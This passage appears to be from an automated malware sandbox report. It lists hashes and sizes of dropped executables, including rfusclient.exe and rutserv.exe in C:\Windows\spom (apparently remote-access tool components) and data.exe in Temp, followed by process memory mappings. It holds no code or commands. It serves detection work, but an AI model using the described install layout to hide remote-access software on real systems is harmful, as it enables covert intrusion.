SHA2564cbdb4d4bad628128557ff0625f7ecc73801f5ed2324d731c1c70c70ea469e96
SHA512244a992bb21053ee9045df6f4d6f82d1119859d145c0867badbb1f4af1dd38bfd7105fb0584199098663a019b29db74b649279c946a75b48646707bedbdd4654
-
C:\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
\Users\Admin\AppData\Local\Temp\data.exeFilesize
819KB
MD571a944406c89ab321cb1e55c37916d70
SHA1be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA2564f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA5129ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
memory/276-57-0x0000000000000000-mapping.dmp
-
memory/464-66-0x0000000000000000-mapping.dmp
-
memory/524-68-0x0000000000000000-mapping.dmp
-
memory/696-117-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/696-110-0x0000000000000000-mapping.dmp
-
memory/696-114-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/744-91-0x0000000000000000-mapping.dmp
-
memory/756-87-0x0000000000000000-mapping.dmp
-
memory/1120-83-0x0000000000000000-mapping.dmp
-
memory/1136-67-0x0000000000000000-mapping.dmp
-
memory/1208-90-0x0000000000000000-mapping.dmp
-
memory/1272-103-0x0000000000000000-mapping.dmp
-
memory/1356-71-0x0000000000000000-mapping.dmp
-
memory/1360-59-0x0000000000000000-mapping.dmp
-
memory/1404-69-0x0000000000000000-mapping.dmp
-
memory/1468-55-0x0000000000400000-0x0000000000425000-memory.dmpFilesize
148KB
-
memory/1468-61-0x0000000000400000-0x0000000000425000-memory.dmpFilesize
148KB
-
memory/1468-54-0x0000000076BA1000-0x0000000076BA3000-memory.dmpFilesize
8KB
-
memory/1552-70-0x0000000000000000-mapping.dmp
-
memory/1556-73-0x0000000000000000-mapping.dmp
-
memory/1628-101-0x0000000000000000-mapping.dmp
-
memory/1628-108-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/1628-116-0x0000000004090000-0x0000000004776000-memory.dmpFilesize
6.9MB
-
memory/1628-113-0x0000000004090000-0x0000000004776000-memory.dmpFilesize
6.9MB
-
memory/1628-115-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/1640-79-0x0000000000000000-mapping.dmp
-
memory/1672-72-0x0000000000000000-mapping.dmp
-
memory/1896-88-0x0000000000000000-mapping.dmp
-
memory/1908-86-0x0000000000000000-mapping.dmp
-
memory/1916-89-0x0000000000000000-mapping.dmp
-
memory/1936-65-0x0000000000000000-mapping.dmp
-
memory/1996-107-0x0000000002DF0000-0x00000000034D6000-memory.dmpFilesize
6.9MB
-
memory/1996-106-0x0000000002DF0000-0x00000000034D6000-memory.dmpFilesize
6.9MB
-
memory/2016-94-0x0000000000000000-mapping.dmp
-
memory/2044-92-0x0000000000000000-mapping.dmp